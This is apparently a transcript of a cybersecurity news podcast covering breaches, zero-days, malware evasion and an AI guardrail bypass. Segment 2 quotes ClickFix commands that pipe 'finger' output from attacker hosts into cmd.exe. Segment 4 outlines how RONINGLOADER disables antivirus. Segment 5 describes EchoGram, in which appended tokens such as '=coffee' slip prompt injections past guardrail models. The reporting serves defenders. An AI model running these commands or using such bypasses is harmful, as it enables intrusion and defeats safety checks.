Daily Cyber Briefing
The Daily Cyber Briefing delivers concise, no-fluff updates on the latest cybersecurity threats, breaches, and regulatory changes. Each episode equips listeners with actionable insights to stay ahead of emerging risks in today’s fast-moving digital landscape.
Daily Cyber Briefing
Legacy Exploits and Guardrail Failures: Finger Protocol, FortiWeb Zero-Days, and EchoGram Tokens
Today. I dive into how decades-old tech, like the "Finger" protocol, is being weaponized in modern ClickFix attacks, alongside major zero-day exploitation news affecting FortiWeb and Logitech. We also unpack the sophisticated techniques used by threat actors like Dragon Breath to disable security tools and the concerning new ways researchers are bypassing AI guardrails.
Mike Housch (Host): Welcome back to Cyber Scoops & Digital Shenanigans, the podcast where we break down the latest, most complex cyber threats and security news. I’m your host, Mike Housch.
It has been an incredibly busy week, highlighting the tension between ancient, forgotten protocols and cutting-edge AI vulnerabilities. We’ve got zero-day exploitation ramping up, major companies confirming breaches, and some truly wild evasion tactics being deployed by sophisticated malware campaigns. We’re talking about DoorDash leaking data again, Logitech confirming a zero-day incident, and how a simple text string like =coffee can completely destabilize your AI defenses.
Let’s get right into the scoops.
Segment 1: The Week’s Headline Breaches (3 minutes)
Mike Housch: We start with two major corporate data incidents confirmed this week.
First, Logitech confirmed a data breach. The consumer electronics company reported in an SEC filing that they experienced a cybersecurity incident involving data exfiltration. This disclosure came shortly after Logitech was publicly named on the Cl0p ransomware leak site as a victim of a campaign targeting customers of Oracle’s E-Business Suite, or EBS, enterprise resource planning solution.
Logitech stated that the unauthorized third party utilized a zero-day vulnerability in a third-party software platform to copy certain data from their internal IT system. They believe the stolen data included limited information about employees and consumers, as well as data related to customers and suppliers. Importantly, Logitech doesn't believe sensitive personal information, like national ID numbers or credit card data, was in the impacted system. The attackers allegedly leaked 1.8 terabytes of archive files. The Cl0p campaign targeting Oracle EBS customers has named over 50 victims, including organizations like The Washington Post and American Airlines subsidiary Envoy Air.
Next, DoorDash is notifying customers of a recent data breach, which is reportedly the third time the food delivery service has leaked data. The breach was the result of a social engineering attack that targeted one of DoorDash’s employees. The attackers stole user information including names, addresses, email addresses, and phone numbers. This compromised data affects customers, Dashers (their delivery drivers), and merchants across the US, Canada, Australia, and New Zealand. DoorDash confirmed that no sensitive information like Social Security numbers, driver’s license information, or bank details were accessed.
It’s a clear reminder that social engineering and supply chain vulnerabilities continue to be the biggest headaches for CISOs.
Segment 2: The Return of the Finger Protocol (4 minutes)
Mike Housch: Now, let’s pivot to something truly bizarre: the comeback of a decades-old protocol.
Our sources reveal that the "finger" command, which was popular decades ago for looking up basic user information on Unix and Linux systems, is being abused by threat actors in modern malware attacks.
The Finger protocol (which uses TCP port 79) is being leveraged in what appear to be ClickFix malware attacks. Threat actors are using the finger command as a method to retrieve remote commands that they then execute on Windows devices. This isn't the first time this has happened; researchers warned about its use as a LOLBIN (or Living Off the Land Binary) back in 2020 to download malware and evade detection.
Here's how this "digital necromancy" works: A cybersecurity researcher shared a batch file that executes the command, and I’m going to read a simplified version of it: finger root@finger.nateams[.]com and then pipes its output through cmd.exe. This means the output from the remote server—which is designed to look like user information—is actually a series of malicious commands that are executed locally.
In a recent example shared on Reddit, a victim fell for a ClickFix attack impersonating a Captcha, prompting them to run a Windows command like this: cmd /c start "" /min cmd /c "finger vke@finger.cloudmega[.]org | cmd".
When executed, the retrieved commands perform a multi-step infection process: they create a random-named path, copy curl.exe to a random filename, use the renamed curl executable to download a zip archive disguised as a PDF, and then extract and execute a Python malware package. Other campaigns have been found running commands to look for tools commonly used in malware research—things like Wireshark, Fiddler, and Process Hacker—and they exit if those tools are found, which is a clear evasion tactic. If no research tools are found, one campaign extracts the NetSupport Manager RAT package and sets up a scheduled task to launch the remote access malware when the user logs in.
For defenders listening, the simplest and best way to block this type of abuse is to block outgoing traffic to TCP port 79, which is what the Finger protocol uses to connect to a daemon. It's shocking how the oldest tools sometimes make the most effective modern weapons.
Segment 3: The Zero-Day Explosion (4 minutes)
Mike Housch: Moving into the world of active exploitation, zero-days are hitting the headlines hard.
First, Fortinet confirmed they silently patched a critical zero-day vulnerability in their FortiWeb web application firewall. This flaw, now tracked as CVE-2025-64446, is a path confusion vulnerability in FortiWeb's GUI component. This zero-day has been "massively exploited in the wild" by unauthenticated attackers. Attackers were using it as far back as early October to create new administrative users on Internet-exposed devices.
Fortinet patched this silently in version 8.0.2, released on October 28th, three weeks after the initial reports of active exploitation began. Due to the severity, CISA added this flaw to its catalog of actively exploited vulnerabilities, ordering U.S. federal agencies to patch by November 21st. If you can’t upgrade immediately, Fortinet advises disabling HTTP/HTTPS for all internet-facing management interfaces.
Second, we see a widespread exploitation of a critical vulnerability in XWiki. The flaw, CVE-2025-24893, allows remote, unauthenticated attackers to execute arbitrary code via crafted requests to a search endpoint. This bug was reported and patched earlier in 2024, but technical information became public in early 2025, leading to mass exploitation.
What started as reconnaissance quickly expanded. We are now seeing multiple threat actors leveraging this: the RondoDox botnet has added the exploit to its toolset, and it's being heavily targeted in two separate cryptocurrency mining operations. This highlights the speed at which exploits move from PoC to being weaponized by sophisticated botnets and opportunistic scanners.
Segment 4: Evasion and Sophisticated Malware (4 minutes)
Mike Housch: Our next scoop delves into how malware authors are perfecting their craft, focusing heavily on evasion.
The threat actor known as Dragon Breath, also tracked as APT-Q-27 and Golden Eye, is using a multi-stage loader called RONINGLOADER to deliver a modified version of Gh0st RAT. This campaign primarily targets Chinese-speaking users, often employing trojanized NSIS installers disguised as legitimate applications like Google Chrome and Microsoft Teams.
RONINGLOADER is exceptionally focused on neutralizing endpoint security products popular in the Chinese market. This is done using multiple redundancies and advanced techniques:
First, it scans for hard-coded antivirus solutions, including Microsoft Defender Antivirus, Kingsoft Internet Security, and Qihoo 360 Total Security, and proceeds to terminate those processes.
For Qihoo 360 Total Security, the process is incredibly complex: it blocks all network communication, injects shellcode into the Volume Shadow Copy service (vssvc.exe) process using the PoolParty technique, and then loads a legitimately signed driver called ollama.sys to terminate security processes by means of a temporary service. It then restores firewall settings. Furthermore, the malware abuses Protected Process Light (PPL) and the Windows Error Reporting system (WerFaultSecure.exe) to disable Microsoft Defender Antivirus. It also targets Windows Defender Application Control (WDAC) by writing a malicious policy that explicitly blocks specific Chinese security vendors.
The ultimate goal is to inject the rogue DLL into a legitimate Windows binary, like regsvr32.exe, to conceal its activity before launching the final Gh0st RAT payload into a high-privilege system process like TrustedInstaller.exe. Gh0st RAT is then capable of fetching additional instructions, clearing Windows Event logs, and capturing keystrokes and clipboard data.
And speaking of sneaky returns, the Lumma Stealer network is back following an FBI disruption. The new variant utilizes browser fingerprinting and masks its initial infection by hiding within Microsoft Edge Update installers. Crucially, it uses process injection to execute within trusted Chrome browser processes, making it appear as legitimate browser traffic to network monitoring systems, effectively bypassing many security controls.
Segment 5: Digital Shenanigans: Bypassing AI Guardrails (3 minutes)
Mike Housch: Finally, let’s look at the future of digital defense, which includes the increasingly important role of AI guardrails. But even these are proving susceptible to simple attacks.
Researchers at HiddenLayer developed an attack technique called EchoGram that targets the guardrails deployed to protect large language models (LLMs). These guardrails are often machine learning models themselves, designed to catch malicious input or harmful output.
EchoGram serves as a way to enable direct prompt injection attacks. Prompt injection forces an LLM to subvert its instructions, essentially forcing task redirection. The EchoGram technique discovers text sequences—sometimes no more complicated than the string =coffee or even oz—that, when appended to a prompt injection attack, allow the input to bypass the guardrails that would otherwise block it.
These guardrails rely on curated datasets to learn what constitutes unsafe or malicious input. EchoGram systematically finds tokens that cause the guardrail model's verdict to "flip" from malicious to safe.
Researchers note that AI guardrails are often the first, and sometimes only, line of defense between a secure system and an LLM tricked into revealing secrets or executing harmful instructions. EchoGram proves that these defenses can be systematically bypassed or destabilized even without insider access or specialized tools.
It’s a powerful metaphor for our current cyber landscape: whether you're using a decades-old protocol like Finger or implementing the latest AI defenses, attackers are finding the simple, overlooked flaw—the hidden token or the forgotten port—to get through.
Mike Housch: That wraps up this episode of Cyber Scoops & Digital Shenanigans. Stay safe out there, block TCP port 79, and remember that when it comes to security, trust is the first vulnerability.